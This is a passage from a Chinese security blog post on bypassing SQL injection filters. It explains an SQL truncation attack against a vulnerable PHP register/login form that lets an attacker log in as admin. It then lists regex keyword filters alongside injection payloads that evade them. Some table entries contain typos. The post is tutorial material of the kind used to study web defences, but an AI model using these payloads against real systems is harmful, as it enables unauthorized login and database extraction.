class="hljs-string">&#x27;username&#x27;</span>]);<br><span class="hljs-variable">$password</span> = <span class="hljs-title function_ invoke__">addslashes</span>(@<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>]);<br><span class="hljs-variable">$sql1</span> = <span class="hljs-string">&quot;select * from users where username = &#x27;<span class="hljs-subst">$username</span>&#x27;&quot;</span>;<br><span class="hljs-variable">$rs</span> = <span class="hljs-title function_ invoke__">mysqli_query</span>(<span class="hljs-variable">$conn</span>,<span class="hljs-variable">$sql1</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$rs</span>-&gt;<span class="hljs-title function_ invoke__">fetch_row</span>())&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;账号已注册&#x27;</span>);<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-variable">$sql2</span> = <span class="hljs-string">&quot;insert into users values(&#x27;<span class="hljs-subst">$username</span>&#x27;,&#x27;<span class="hljs-subst">$password</span>&#x27;)&quot;</span>;<br>    <span class="hljs-title function_ invoke__">mysqli_query</span>(<span class="hljs-variable">$conn</span>,<span class="hljs-variable">$sql2</span>);<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;注册成功&#x27;</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br><br><span class="hljs-comment">// 登录</span><br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$conn</span> = <span class="hljs-title function_ invoke__">mysqli_connect</span>(<span class="hljs-string">&quot;127.0.0.1:3306&quot;</span>, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;db&quot;</span>);<br><span class="hljs-keyword">if</span> (!<span class="hljs-variable">$conn</span>) &#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Connection failed: &quot;</span> . <span class="hljs-title function_ invoke__">mysqli_connect_error</span>());<br>&#125;<br><span class="hljs-variable">$username</span> = <span class="hljs-title function_ invoke__">addslashes</span>(@<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;username&#x27;</span>]);<br><span class="hljs-variable">$password</span> = <span class="hljs-title function_ invoke__">addslashes</span>(@<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>]);<br><span class="hljs-variable">$sql</span> = <span class="hljs-string">&quot;select * from users where username = &#x27;<span class="hljs-subst">$username</span>&#x27; and password=&#x27;<span class="hljs-subst">$password</span>&#x27;;&quot;</span>;<br><span class="hljs-variable">$rs</span> = <span class="hljs-title function_ invoke__">mysqli_query</span>(<span class="hljs-variable">$conn</span>,<span class="hljs-variable">$sql</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$rs</span>-&gt;<span class="hljs-title function_ invoke__">fetch_row</span>())&#123;<br>    <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;username&#x27;</span>]=<span class="hljs-variable">$password</span>;<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;fail&quot;</span>;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>这里没有编码问题，也进行了转移操作，由于存在长度限制，故可尝试sql约束攻击。注册名为<code>admin                         1</code>的用户名，密码自定，随后使用admin登录，密码就是刚刚的密码，发现登录成功。(原理，注册时select的时候，超长度的字段不会截取，故检查出未注册，而insert的时候会截取前25个字符，故再进行登录的时候’admin’&#x3D;’admin                     ‘，从而登录成功)</p>
<h4 id="0x0c-常见过滤绕过方法"><a href="#0x0c-常见过滤绕过方法" class="headerlink" title="0x0c 常见过滤绕过方法"></a>0x0c 常见过滤绕过方法</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><code class="hljs sql">过滤关键字    <span class="hljs-keyword">and</span> <span class="hljs-keyword">or</span><br>php代码    preg_match(<span class="hljs-string">&#x27;/(and|or)/i&#x27;</span>,$id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-keyword">or</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">||</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span><br><br>过滤关键字    <span class="hljs-keyword">and</span> <span class="hljs-keyword">or</span> <span class="hljs-keyword">union</span><br>php代码    preg_match(<span class="hljs-string">&#x27;/(and|or|union)/i&#x27;</span>,$id)<br>会过滤的攻击代码    <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span>,password <span class="hljs-keyword">from</span> users<br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> userid<span class="hljs-operator">=</span><span class="hljs-number">1</span>)<span class="hljs-operator">=</span><span class="hljs-string">&#x27;admin&#x27;</span><br><br>过滤关键字    <span class="hljs-keyword">and</span> <span class="hljs-keyword">or</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">where</span><br>php代码    preg_match(<span class="hljs-string">&#x27;/(and|or|union|where)/i&#x27;</span>,$id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> user_id <span class="hljs-operator">=</span> <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users limit <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><br><br>过滤关键字    <span class="hljs-keyword">and</span> <span class="hljs-keyword">or</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">where</span><br>php代码    preg_match(<span class="hljs-string">&#x27;/(and|or|union|where)/i&#x27;</span>,$id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> user_id <span class="hljs-operator">=</span> <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users limit <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><br><br>过滤关键字    <span class="hljs-keyword">and</span>, <span class="hljs-keyword">or</span>, <span class="hljs-keyword">union</span>, <span class="hljs-keyword">where</span>, limit<br>php代码    preg_match(<span class="hljs-string">&#x27;/(and|or|union|where|limit)/i&#x27;</span>, $id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users limit <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> user_id <span class="hljs-keyword">having</span> user_id <span class="hljs-operator">=</span> <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span>#user_id聚合中user_id为<span class="hljs-number">1</span>的<span class="hljs-keyword">user</span>为admin<br><br>过滤关键字    <span class="hljs-keyword">and</span>, <span class="hljs-keyword">or</span>, <span class="hljs-keyword">union</span>, <span class="hljs-keyword">where</span>, limit, <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span><br>php代码    preg_match(<span class="hljs-string">&#x27;/(and|or|union|where|limit|group by)/i&#x27;</span>, $id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> user_id <span class="hljs-keyword">having</span> user_id <span class="hljs-operator">=</span> <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> substr(group_concat(user_id),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users ) <span class="hljs-operator">=</span> <span class="hljs-number">1</span><br><br>过滤关键字    <span class="hljs-keyword">and</span>, <span class="hljs-keyword">or</span>, <span class="hljs-keyword">union</span>, <span class="hljs-keyword">where</span>, limit, <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span>, <span class="hljs-keyword">select</span><br>php代码    preg_match(<span class="hljs-string">&#x27;/(and|or|union|where|limit|group by|select)/i&#x27;</span>, $id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> substr(gruop_concat(user_id),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users) <span class="hljs-operator">=</span> <span class="hljs-number">1</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;a&#x27;</span><br><br>过滤关键字    <span class="hljs-keyword">and</span>, <span class="hljs-keyword">or</span>, <span class="hljs-keyword">union</span>, <span class="hljs-keyword">where</span>, limit, <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span>, <span class="hljs-keyword">select</span>, <span class="hljs-string">&#x27;</span><br><span class="hljs-string">php代码    preg_match(&#x27;</span><span class="hljs-operator">/</span>(<span class="hljs-keyword">and</span><span class="hljs-operator">|</span><span class="hljs-keyword">or</span><span class="hljs-operator">|</span><span class="hljs-keyword">union</span><span class="hljs-operator">|</span><span class="hljs-keyword">where</span><span class="hljs-operator">|</span>limit<span class="hljs-operator">|</span><span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span><span class="hljs-operator">|</span><span class="hljs-keyword">select</span><span class="hljs-operator">|</span>\<span class="hljs-string">&#x27;)/i&#x27;</span>, $id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> (<span class="hljs-keyword">select</span> substr(gruop_concat(user_id),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users) <span class="hljs-operator">=</span> <span class="hljs-number">1</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> user_id <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-number">0x61</span> <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-operator">=</span> unhex(<span class="hljs-number">61</span>)<br><br>过滤关键字    <span class="hljs-keyword">and</span>, <span class="hljs-keyword">or</span>, <span class="hljs-keyword">union</span>, <span class="hljs-keyword">where</span>, limit, <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span>, <span class="hljs-keyword">select</span>, <span class="hljs-string">&#x27;, hex</span><br><span class="hljs-string">php代码    preg_match(&#x27;</span><span class="hljs-operator">/</span>(<span class="hljs-keyword">and</span><span class="hljs-operator">|</span><span class="hljs-keyword">or</span><span class="hljs-operator">|</span><span class="hljs-keyword">union</span><span class="hljs-operator">|</span><span class="hljs-keyword">where</span><span class="hljs-operator">|</span>limit<span class="hljs-operator">|</span><span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span><span class="hljs-operator">|</span><span class="hljs-keyword">select</span><span class="hljs-operator">|</span>\<span class="hljs-string">&#x27;|hex)/i&#x27;</span>, $id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-operator">=</span> unhex(<span class="hljs-number">61</span>)<br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-built_in">lower</span>(conv(<span class="hljs-number">11</span>,<span class="hljs-number">10</span>,<span class="hljs-number">16</span>)) #十进制的<span class="hljs-number">11</span>转化为十六进制，并小写。<br><br>过滤关键字    <span class="hljs-keyword">and</span>, <span class="hljs-keyword">or</span>, <span class="hljs-keyword">union</span>, <span class="hljs-keyword">where</span>, limit, <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span>, <span class="hljs-keyword">select</span>, <span class="hljs-string">&#x27;, hex, substr</span><br><span class="hljs-string">php代码    preg_match(&#x27;</span><span class="hljs-operator">/</span>(<span class="hljs-keyword">and</span><span class="hljs-operator">|</span><span class="hljs-keyword">or</span><span class="hljs-operator">|</span><span class="hljs-keyword">union</span><span class="hljs-operator">|</span><span class="hljs-keyword">where</span><span class="hljs-operator">|</span>limit<span class="hljs-operator">|</span><span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span><span class="hljs-operator">|</span><span class="hljs-keyword">select</span><span class="hljs-operator">|</span>\<span class="hljs-string">&#x27;|hex|substr)/i&#x27;</span>, $id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> substr(<span class="hljs-keyword">user</span>,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-built_in">lower</span>(conv(<span class="hljs-number">11</span>,<span class="hljs-number">10</span>,<span class="hljs-number">16</span>))<span class="hljs-operator">/</span>td<span class="hljs-operator">&gt;</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> lpad(<span class="hljs-keyword">user</span>,<span class="hljs-number">7</span>,<span class="hljs-number">1</span>)<br><br>过滤关键字    <span class="hljs-keyword">and</span>, <span class="hljs-keyword">or</span>, <span class="hljs-keyword">union</span>, <span class="hljs-keyword">where</span>, limit, <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span>, <span class="hljs-keyword">select</span>, <span class="hljs-string">&#x27;, hex, substr, 空格</span><br><span class="hljs-string">php代码    preg_match(&#x27;</span><span class="hljs-operator">/</span>(<span class="hljs-keyword">and</span><span class="hljs-operator">|</span><span class="hljs-keyword">or</span><span class="hljs-operator">|</span><span class="hljs-keyword">union</span><span class="hljs-operator">|</span><span class="hljs-keyword">where</span><span class="hljs-operator">|</span>limit<span class="hljs-operator">|</span><span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span><span class="hljs-operator">|</span><span class="hljs-keyword">select</span><span class="hljs-operator">|</span>\<span class="hljs-string">&#x27;|hex|substr|\s)/i&#x27;</span>, $id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">&amp;&amp;</span> lpad(<span class="hljs-keyword">user</span>,<span class="hljs-number">7</span>,<span class="hljs-number">1</span>)<span class="hljs-operator">/</span>td<span class="hljs-operator">&gt;</span><br>绕过方式    <span class="hljs-number">1</span><span class="hljs-operator">%</span><span class="hljs-number">0</span>b<span class="hljs-operator">||</span><span class="hljs-operator">%</span><span class="hljs-number">0</span>blpad(<span class="hljs-keyword">user</span>,<span class="hljs-number">7</span>,<span class="hljs-number">1</span>)<br><br>过滤关键字    <span class="hljs-keyword">and</span> <span class="hljs-keyword">or</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">where</span><br>php代码    preg_match(<span class="hljs-string">&#x27;/(and|or|union|where)/i&#x27;</span>,$id)<br>会过滤的攻击代码    <span class="hljs-number">1</span> <span class="hljs-operator">||</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> user_id <span class="hljs-operator">=</span> <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><br>绕过方式    <span class="hljs-number">1</span> <span class="hljs-operator">||</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> users limit <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;admin&#x27;</span><br></code></pre></td></tr></table></figure>

<p>节选自：<a target="_blank" rel="noopener" href="http://byd.dropsec.xyz/2016/08/01/SQL-Injection%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/">http://byd.dropsec.xyz/2016/08/01/SQL-Injection%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/sql/" class="category-chain-item">sql</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/sql/" class="print-no-link">#sql</a>
      
        <a href="/tags/WAF%E7%BB%95%E8%BF%87/" class="print-no-link">#WAF绕过</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>sql注入绕过</div>
      <div>https://pho3n1x-web.github.io/2022/06/16/sql注入绕过/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>Pho3n1x</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>June 16, 2022</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              <A HREF="HTTPS://CREATIVECOMMONS.ORG/LICENSES/BY-NC-SA/4.0/">CC BY-NC-SA 4.0</A>
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/06/16/sql%E5%A4%87%E5%BF%98%E5%BD%95/" title="sql备忘录">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">sql备忘录</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        Views: 
        <span id="busuanzi_value_site_pv"></span>
        
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        Visitors: 
        <span id="busuanzi_value_site_uv"></span>
        
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
